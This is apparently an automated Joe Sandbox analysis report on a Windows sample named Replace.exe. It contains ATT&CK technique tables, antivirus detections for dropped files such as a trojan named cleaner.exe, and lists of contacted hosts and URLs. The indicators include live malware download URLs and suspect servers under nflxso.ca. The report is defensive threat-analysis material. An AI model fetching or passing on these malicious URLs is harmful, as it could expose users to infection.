DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 122 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior graph (image not reproduced): Behavior Graph ID: 1434556, Sample: Replace.exe, Startdate: 01/05/2024, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label | Link
Replace.exe | 29% | ReversingLabs | Win32.PUA.Presenoker |
Replace.exe | 49% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp | 100% | Avira | PUA/Agent.clw |
C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp | 100% | Avira | PUA/Agent.clw |
C:\Users\user\AppData\Local\Temp\wsc86FC.tmp | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Local\Temp\wnsA071.tmp | 100% | Avira | PUA/Agent.clw |
C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\wsc86FC.tmp | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\wnsA071.tmp | 100% | Joe Sandbox ML | |
C:\Program Files\Image-Line\FL Studio 20\FL64.exe | 0% | ReversingLabs | |
C:\Program Files\Image-Line\FL Studio 20\FL64.exe | 1% | Virustotal | | Browse
C:\Program Files\Image-Line\FL Studio 20\FLEngine_x64.dll | 0% | ReversingLabs | |
C:\Program Files\Image-Line\FL Studio 20\FLEngine_x64.dll | 6% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe | 88% | ReversingLabs | Win32.Trojan.Leonem |
C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe | 73% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe | 0% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe | 9% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe | 7% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\wnsA071.tmp | 83% | ReversingLabs | Win32.PUA.Presenoker |
C:\Users\user\AppData\Local\Temp\wnsA071.tmp | 77% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp | 83% | ReversingLabs | Win32.PUA.Presenoker |
C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp | 77% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp | 83% | ReversingLabs | Win32.PUA.Presenoker |
C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp | 77% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\wsc86FC.tmp | 75% | ReversingLabs | Win32.Trojan.RealProtect |
C:\Users\user\AppData\Local\Temp\wsc86FC.tmp | 67% | Virustotal | | Browse

No Antivirus matches

Source | Detection | Scanner | Label | Link
files.nflxso.ca | 6% | Virustotal | | Browse
register.nflxso.ca | 1% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object | 0% | URL Reputation | safe |
http://crl.dhimyotis.com/certignarootca.crl | 0% | URL Reputation | safe |
https://wwww.certigna.fr/autorites/0m | 0% | URL Reputation | safe |
http://crl.securetrust.com/STCA.crl | 0% | URL Reputation | safe |
https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot | 0% | URL Reputation | safe |
http://www.accv.es00 | 0% | URL Reputation | safe |
https://sourcemaps.info/spec.html | 0% | URL Reputation | safe |
http://crl.securetrust.com/SGCA.crl0 | 0% | URL Reputation | safe |
https://heycam.github.io/webidl/#dfn-default-iterator-object | 0% | URL Reputation | safe |
https://heycam.github.io/webidl/#es-iterable-entries | 0% | URL Reputation | safe |
https://heycam.github.io/webidl/#es-interfaces | 0% | URL Reputation | safe |
https://files.nflxso.ca/t | 0% | Avira URL Cloud | safe |
https://files.nflxso.ca/d | 0% | Avira URL Cloud | safe |
https://files.nflxso.ca/downloads/winapp/latest-version.txt1% | 100% | Avira URL Cloud | malware |
http://register.nflxso.ca:6101/strvn | 0% | Avira URL Cloud | safe |
http://narwhaljs.org) | 0% | Avira URL Cloud | safe |
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl | 0% | Avira URL Cloud | safe |
https://files.nflxso.ca/downloads/winapp/latest-installer.exe3 | 100% | Avira URL Cloud | malware |
https://files.nflxso.ca/downloads/winapp/latest-installer.exe- | 100% | Avira URL Cloud | malware |
http://html4/loose.dtd | 0% | Avira URL Cloud | safe |
http://register.nflxso.ca:6101/strvn | 2% | Virustotal | | Browse
https://files.nflxso.ca/d | 5% | Virustotal | | Browse
http://files.nflxso.ca/downloads/winapp/latest-version.txt | 0% | Avira URL Cloud | safe |
http://.css | 0% | Avira URL Cloud | safe |
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlF | 0% | Avira URL Cloud | safe |
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl | 0% | Virustotal | | Browse
http://files.nflxso.ca/downloads/winapp/latest-version.txt | 5% | Virustotal | | Browse
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlF | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
plus.l.google.com | 172.253.122.101 | true | false | | high
files.nflxso.ca | 172.67.152.151 | true | true | | unknown
www.google.com | 142.251.16.147 | true | false | | high
register.nflxso.ca | 74.201.73.52 | true | false | | unknown
apis.google.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://register.nflxso.ca:6101/strvn | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://files.nflxso.ca/downloads/winapp/latest-version.txt | true | 5%, Virustotal, Browse; Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://url.spec.whatwg.org/#concept-url-origin | node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp | false | | high
https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash | node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp | false | | high
https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape | node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp | false | | high
https://www.image-line.com/newreleases/?username=%s&productcodes=%s&productversions=%s | run.exe, 00000002.00000003.1768566979.000001981A9C7000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://files.nflxso.ca/d | rundll32.exe, 00000007.00000002.2229301918.0000000002F55000.00000004.00000020.00020000.00000000.sdmp | false | 5%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-Atom | node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp | false | | high
https://gist.github.com/XVilka/8346728#gistcomment-2823421 | node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp | false | | high
https://github.com/nodejs/node-v0.x-archive/issues/2876. | node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp | false | | high
http://repository.swisssign.com/0 | node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecma-international.org/ecma-262/#sec-timeclip | node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp | false | | high
https://console.spec.whatwg.org/#table | node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp | false | | high
https://nodejs.org/download/release/v12.22.12/win-x86/node.lib) | node.exe, 0000000F.00000002.2921222937.0000000001F88000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.iana.org/assignments/tls-extensiontype-values | node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp | false | | high
                                https://console.spec.whatwg.org/#console-namespacenode.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                  high
                                  https://url.spec.whatwg.org/#urlnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                    high
                                    https://support.image-line.com/action/license/serial?serial=%srun.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://encoding.spec.whatwg.org/#textencodernode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                        high
                                        https://github.com/nodejs/node/issues/13435node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                          high
                                          https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDashnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                            high
                                            https://goo.gl/t5IS6M).node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                              high
                                              https://tools.ietf.org/html/rfc7230#section-3.2.2node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                high
                                                https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                  high
                                                  https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                    high
                                                    https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertionnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                      high
                                                      https://tc39.github.io/ecma262/#sec-%iteratorprototype%-objectnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://url.spec.whatwg.org/#concept-urlencoded-serializernode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                        high
                                                        http://crl.dhimyotis.com/certignarootca.crlnode.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://nodejs.org/download/release/v12.22.12/win-x86/node.libnode.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          https://files.nflxso.ca/trundll32.exe, 00000001.00000002.2142874146.00000000028CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3Fnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                            high
                                                            http://repository.swisssign.com/Tnode.exe, 0000000F.00000002.2922964130.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.image-line.com/redirect/downloadnewsrssrun.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://nodejs.org/api/fs.htmlnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                  high
                                                                  https://github.com/chalk/ansi-regex/blob/master/index.jsnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                    high
                                                                    https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gzh~node.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/nodejs/node/pull/21313node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                        high
                                                                        https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRangesnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                          high
                                                                          https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                            high
                                                                            https://files.nflxso.ca/downloads/winapp/latest-version.txt1%node.exe, 0000000F.00000003.2232924754.00000000061C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            http://www.midnight-commander.org/browser/lib/tty/key.cnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                              high
                                                                              https://nodejs.org/node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                high
                                                                                https://tools.ietf.org/html/rfc7540#section-8.1.2.5node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                  high
                                                                                  https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscapenode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                    high
                                                                                    https://wwww.certigna.fr/autorites/0mnode.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digitsnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                      high
                                                                                      http://www.squid-cache.org/Doc/config/half_closed_clients/node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                        high
                                                                                        https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscapenode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                          high
                                                                                          https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetternode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                            high
                                                                                            https://stackoverflow.com/a/5501711/3561node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                              high
                                                                                              https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscapenode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                high
                                                                                                http://narwhaljs.org)node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                low
                                                                                                https://www.ecma-international.org/ecma-262/#sec-promise.allnode.exe, 0000000F.00000002.2913751697.0000000001801000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2922785102.0000000004240000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2263968941.000000002C540000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000001801000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                  high
                                                                                                  https://files.nflxso.ca/downloads/winapp/latest-installer.exe3rundll32.exe, 00000007.00000002.2229301918.0000000002F2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  unknown
                                                                                                  https://support.image-line.com/action/redirect/FLStudioAuthentication?username=%s&password=%s&flags=run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://code.google.com/p/chromium/issues/detail?id=25916node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.securetrust.com/STCA.crlnode.exe, 0000000F.00000002.2921222937.0000000001FE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.accv.es/legislacion_c.htmICATE-----Fnode.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.cert.fnmt.es/dpcs/node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://nodejs.org/download/release/v12.22.12/node-v12.22.12-headers.tar.gznode.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://github.com/nodejs/node/pull/12607node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                high
                                                                                                                https://support.image-line.com/redirect/merun.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slotnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlnode.exe, 0000000F.00000002.2922964130.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://www.accv.es00node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://www.ecma-international.org/ecma-262/#sec-line-terminatorsnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txtnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                      high
                                                                                                                      https://api.soundcloud.com/connectrun.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://files.nflxso.ca/downloads/winapp/latest-installer.exe-rundll32.exe, 0000000A.00000003.2261300042.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2284164999.0000000002E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        unknown
                                                                                                                        https://www.ecma-international.org/ecma-262/8.0/#prod-Patternnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                          high
                                                                                                                          https://nodejs.org/download/release/tnode.exe, 00000017.00000002.2261157825.0000000021DE2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://html4/loose.dtdnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            low
                                                                                                                            https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gzknode.exe, 0000000F.00000002.2921222937.0000000001F88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://sourcemaps.info/spec.htmlnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://support.image-line.com/member/regcode.php?inapp=1UHrun.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://nodejs.org/download/release/v12.22.12/win-x86/node.libLynode.exe, 0000000F.00000003.2238553183.0000000032CA2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://invisible-island.net/xterm/ctlseqs/ctlseqs.htmlnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/nodejs/node/pull/12342node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.152.151 | files.nflxso.ca | United States | 13335 | CLOUDFLARENETUS | true
142.251.16.147 | www.google.com | United States | 15169 | GOOGLEUS | false
172.253.122.101 | plus.l.google.com | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
74.201.73.52 | register.nflxso.ca | United States | 63018 | DEDICATEDUS | false
172.253.62.104 | unknown | United States | 15169 | GOOGLEUS | false
                                                                                                                                                                  IP
                                                                                                                                                                  192.168.2.4
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1434556
Start date and time: 2024-05-01 11:07:15 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 52
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Replace.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@90/28@11/7
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 72.7%
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                                  • Number of executed functions: 205
                                                                                                                                                                  • Number of non-executed functions: 154
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 172.253.115.94, 142.251.163.138, 142.251.163.139, 142.251.163.113, 142.251.163.101, 142.251.163.100, 142.251.163.102, 172.253.115.84, 34.104.35.123, 172.253.62.94, 23.207.202.41, 192.229.211.108, 64.233.180.94, 172.253.62.101, 172.253.62.113, 172.253.62.102, 172.253.62.139, 172.253.62.138, 172.253.62.100
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, www.gstatic.com
                                                                                                                                                                  • Execution Graph export aborted for target node.exe, PID 3912 because there are no executed function
                                                                                                                                                                  • Execution Graph export aborted for target node.exe, PID 5328 because there are no executed function
